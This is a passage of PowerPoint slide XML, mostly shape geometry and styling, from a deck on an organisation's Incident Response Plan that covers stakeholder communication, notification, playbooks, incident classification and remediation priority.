                  <a:pt x="157828" y="2782446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126869" y="2751487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98792" y="2717849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73800" y="2681735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52096" y="2643348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33883" y="2602892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19363" y="2560569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8741" y="2516582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2219" y="2471135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2424429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="484886"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="EE63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159367" y="5235981"/>
            <a:ext cx="4731385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14100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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Communication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internal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external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stakeholders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59367" y="6429883"/>
            <a:ext cx="538861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Notification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reporting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necessary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762743" y="3909059"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246371" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246371" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246371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0268839" y="4205986"/>
            <a:ext cx="3399154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45">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Stakeholder</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>management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58915" y="306451"/>
            <a:ext cx="41382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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plan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7676" y="760476"/>
            <a:ext cx="6217920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366259" y="3483864"/>
            <a:ext cx="8435340" cy="1384300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8435340" h="1384300">
                <a:moveTo>
                  <a:pt x="0" y="230632"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4685" y="184149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18123" y="140856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39386" y="101680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67548" y="67548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101680" y="39386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140856" y="18123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184149" y="4685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230631" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8204708" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8251190" y="4685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8294483" y="18123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8333659" y="39386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367791" y="67548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8395953" y="101680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8417216" y="140856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8430654" y="184149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435340" y="230632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435340" y="1153160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8430654" y="1199642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8417216" y="1242935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8395953" y="1282111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367791" y="1316243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8333659" y="1344405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8294483" y="1365668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8251190" y="1379106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8204708" y="1383791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230631" y="1383791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184149" y="1379106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140856" y="1365668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101680" y="1344405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67548" y="1316243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39386" y="1282111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18123" y="1242935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4685" y="1199642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1153160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="230632"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700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557398" y="1882652"/>
            <a:ext cx="11135995" cy="2458085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="622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90"/>
              </a:spcBef>
            </a:pP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Incident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Response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Plan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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(IRP)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outlines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procedures,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contacts,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resources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endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pP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responders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will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have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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>access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event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variety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incident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types.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="5715">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1390"/>
              </a:spcBef>
            </a:pP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dirty="0" sz="2200" spc="-5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uses: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50">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3901440">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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Playbooks,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a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type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data-driven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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SOP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360164" y="5234940"/>
            <a:ext cx="8441690" cy="1297305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8441690" h="1297304">
                <a:moveTo>
                  <a:pt x="0" y="216154"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5708" y="166591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21969" y="121094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47486" y="80960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80960" y="47486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121094" y="21969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166591" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216153" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8225282" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8274844" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8320341" y="21969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8360475" y="47486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8393949" y="80960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8419466" y="121094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435727" y="166591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8441436" y="216154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8441436" y="1080770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435727" y="1130332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8419466" y="1175829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8393949" y="1215963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8360475" y="1249437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8320341" y="1274954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8274844" y="1291215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8225282" y="1296924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216153" y="1296924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166591" y="1291215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121094" y="1274954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80960" y="1249437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47486" y="1215963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21969" y="1175829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5708" y="1130332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1080770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="216154"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700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652642" y="5448791"/>
            <a:ext cx="6457315" cy="79184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75"/>
              </a:spcBef>
            </a:pP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Various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vulnerable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categories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help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classify</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="63500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pP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incidences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38855" y="3692652"/>
            <a:ext cx="900683" cy="90068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38855" y="5340096"/>
            <a:ext cx="900683" cy="899159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4360164" y="6899147"/>
            <a:ext cx="8441690" cy="1297305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8441690" h="1297304">
                <a:moveTo>
                  <a:pt x="0" y="216153"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5708" y="166591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21969" y="121094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47486" y="80960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80960" y="47486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121094" y="21969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166591" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216153" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8225282" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8274844" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8320341" y="21969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8360475" y="47486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8393949" y="80960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8419466" y="121094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435727" y="166591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8441436" y="216153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8441436" y="1080757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435727" y="1130324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8419466" y="1175825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8393949" y="1215961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8360475" y="1249436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8320341" y="1274953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8274844" y="1291215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8225282" y="1296923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216153" y="1296923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166591" y="1291215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121094" y="1274953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80960" y="1249436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47486" y="1215961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21969" y="1175825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5708" y="1130324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1080757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="216153"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700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136007" y="7353427"/>
            <a:ext cx="748919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Remediation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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>priority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is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dependent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various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factors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38855" y="7004304"/>
            <a:ext cx="900683" cy="900684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58915" y="306451"/>
            <a:ext cx="41382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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plan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7676" y="760476"/>
            <a:ext cx="6217920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633971" y="4073652"/>
            <a:ext cx="3229610" cy="2903220"/>
            <a:chOff x="6633971" y="4073652"/>
            <a:chExt cx="3229610" cy="290322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43215" y="5550408"/>
              <a:ext cx="1610868" cy="142646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516758" y="5621655"/>
              <a:ext cx="1468755" cy="1288415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1468754" h="1288415">
                  <a:moveTo>
                    <a:pt x="734177" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="707598" y="8858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684139" y="35432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11166" y="1201927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1235386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5657" y="1262808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26578" y="1281348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61204" y="1288160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1407150" y="1288160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441775" y="1281348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462696" y="1262808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1468354" y="1235386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1457188" y="1201927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784215" y="35432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760755" y="8858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734177" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFC21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33971" y="5477256"/>
              <a:ext cx="1609344" cy="14264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707514" y="5548884"/>
              <a:ext cx="1468120" cy="1287145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1468120" h="1287145">
                  <a:moveTo>
                    <a:pt x="1407150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61204" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26578" y="6671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5657" y="24892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="51970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11166" y="85216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684139" y="1252092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707582" y="1278167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734050" y="1286859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760327" y="1278167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783199" y="1252092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456172" y="85216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467925" y="51970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462569" y="24891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441759" y="6671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1407150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00669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44739" y="4073652"/>
              <a:ext cx="1607820" cy="142646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517187" y="4145280"/>
              <a:ext cx="1468120" cy="1288415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1468120" h="1288414">
                  <a:moveTo>
                    <a:pt x="1406721" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="60775" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26165" y="6812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="25352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="52774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11753" y="86233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683710" y="1252728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707169" y="1279302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733748" y="1288161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760327" y="1279302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783786" y="1252728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1455743" y="86233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467496" y="52774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462141" y="25352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441330" y="6812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1406721" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="3D0C0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53983" y="5477256"/>
              <a:ext cx="1609344" cy="142646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326431" y="5548884"/>
              <a:ext cx="1468120" cy="1287145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1468120" h="1287145">
                  <a:moveTo>
                    <a:pt x="1406721" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="60775" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26165" y="6671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="24892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="51970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11753" y="85216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684726" y="1252092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707598" y="1278167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733875" y="1286859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760343" y="1278167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783786" y="1252092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456759" y="85216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467925" y="51970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462268" y="24891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441346" y="6671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1406721" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD69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53983" y="4146804"/>
              <a:ext cx="1609344" cy="142493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8326431" y="4218384"/>
              <a:ext cx="1468120" cy="1286510"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1468120" h="1286510">
                  <a:moveTo>
                    <a:pt x="733875" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="707598" y="8899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684726" y="35099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11753" y="1200197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1233582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="1260967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26165" y="1279493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60775" y="1286303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1406721" y="1286303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441346" y="1279493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462268" y="1260967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467925" y="1233582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456759" y="1200197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783786" y="35099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760343" y="8649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733875" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="16BAD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33971" y="4146804"/>
              <a:ext cx="1609344" cy="142493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707514" y="4218384"/>
              <a:ext cx="1468120" cy="1286510"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1468120" h="1286510">
                  <a:moveTo>
                    <a:pt x="734050" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="707582" y="8649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684139" y="35099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11166" y="1200197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1233582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5657" y="1260967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26578" y="1279493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61204" y="1286303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1407150" y="1286303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441759" y="1279493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462569" y="1260967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467925" y="1233582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456172" y="1200197"/>
                  </a:lnTo>
                  <a:lnTo>
